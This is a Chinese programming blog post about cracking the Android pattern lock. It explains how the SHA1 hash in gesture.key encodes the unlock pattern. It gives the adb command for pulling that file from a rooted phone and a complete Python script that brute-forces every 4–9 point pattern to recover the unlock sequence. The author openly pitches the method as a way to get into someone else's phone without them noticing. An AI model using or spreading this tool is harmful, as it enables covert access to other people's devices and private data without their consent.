基于Python的Android图形锁破解程序详解编程语言

安卓手机的图形锁是3×3的点阵,按次序连接数个点从而达到锁定/解锁的功能。最少需要连接4个点,最多能连接9个点。网上也有暴力删除手机图形锁的方法,即直接干掉图形锁功能。但假如你想进入别人的手机,但又不想引起其警觉的话……你可以参考一下本文(前提条件:手机需要root,而且打开调试模式。一般来讲,如果用过诸如“豌豆荚手机助手”、“360手机助手”一类的软件,都会被要求打开调试模式的。如果要删除手机内置软件,则需要将手机root)。

首先科普一下,安卓手机是如何标记这9个点的。通过阅读安卓系统源码可知,每个点都有其编号,组成了一个3×3的矩阵,形如:

00 01 02

03 04 05

06 07 08

假如设定解锁图形为一个“L”形,如图:

基于Python的Android图形锁破解程序详解编程语言

那么这几个点的排列顺序是这样的:00 03 06 07 08。 系统就记下来了这一串数字,然后将这一串数字(以十六进制的方式)进行SHA1加密,存储在了手机里的/data/system /gesture.key 文件中。我们用数据线连接手机和电脑,然后ADB连接手机,将文件下载到电脑上(命令:adb pull /data/system/gesture.key gesture.key),如图:

基于Python的Android图形锁破解程序详解编程语言

 

用WinHex等十六进制编辑程序打开gesture.key,会发现文件内是SHA1加密过的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如图:

基于Python的Android图形锁破解程序详解编程语言

当你下次解锁的时候,系统就对比你画的图案,看对应的数字串是不是0003060708对应的加密结果。如果是,就解锁;不是就继续保持锁定。那么,如果穷举所有的数字串排列,会有多少呢?联想到高中的阶乘,如果用4个点做解锁图形的话,就是9x8x7x6=3024种可能性,那5个点就是15120,6个点的话60480,7个点181440,8个点362880,9个点362880。总共是985824种可能性(但这么计算并不严密,因为同一条直线上的点只能和他们相邻的点相连)。满打满算,也不到985824种可能性。乍一看很大,但在计算机面前,穷举出来这些东西用不了几秒钟。

知道了原理,就着手写程序来实现吧。这里使用了Python来完成任务。主要应用了hashlib模块(对字符串进行SHA1加密)和itertools模块(Python内置,生成00-09的排列组合)。主要流程为:

1.ADB连接手机,获取gesture.key文件

2.读取key文件,存入字符串str_A

3.生成全部可能的数字串

4.对这些数字串进行加密,得到字符串str_B

5.将字符串str_A与str_B进行对比

6.如果字符串A,B相同,则说明数字串num就是想要的解锁顺序

7.打印出数字串num

代码如下:

# -*- coding: cp936 -*- 
import itertools 
import hashlib 
import time 
import os 
 
#调用cmd,ADB连接到手机,读取SHA1加密后的字符串 
os.system("adb pull /data/system/gesture.key gesture.key") 
time.sleep(5) 
f=open('gesture.key','r') 
pswd=f.readline() 
f.close() 
pswd_hex=pswd.encode('hex') 
print '加密后的密码为:%s'%pswd_hex 
 
#生成解锁序列,得到['00','01','02','03','04','05','06','07','08'] 
matrix=[]  
for i in range(0,9): 
    str_temp = '0'+str(i) 
    matrix.append(str_temp) 
 
#将00——08的字符进行排列,至少取4个数排列,最多全部进行排列 
 
min_num=4 
max_num=len(matrix) 
 
for num in range(min_num,max_num+1):#从04 -> 08 
    iter1 = itertools.permutations(matrix,num)#从9个数字中挑出n个进行排列 
    list_m=[] 
    list_m.append(list(iter1))#将生成的排列全部存放到 list_m 列表中 
    for el in list_m[0]:#遍历这n个数字的全部排列 
        strlist=''.join(el)#将list转换成str。[00,03,06,07,08]-->0003060708 
        strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#将字符串进行SHA1加密 
        if pswd_hex==strlist_sha1:#将手机文件里的字符串与加密字符串进行对比 
            print '解锁密码为:',strlist

按说得到解锁密码后,应该break跳出循环的。但Python没有跳出多重循环的语句,本想设置标志位然后不停进行判定,为了运行速度就免去了这个步骤(有没有更好的实现跳出多重循环的方法?)。另外也略去了很多容错语句。

原创文章,作者:Maggie-Hunter,如若转载,请注明出处:https://blog.ytso.com/8239.html

(0)
上一篇 2021年7月18日
下一篇 2021年7月18日

相关推荐

发表回复

登录后才能评论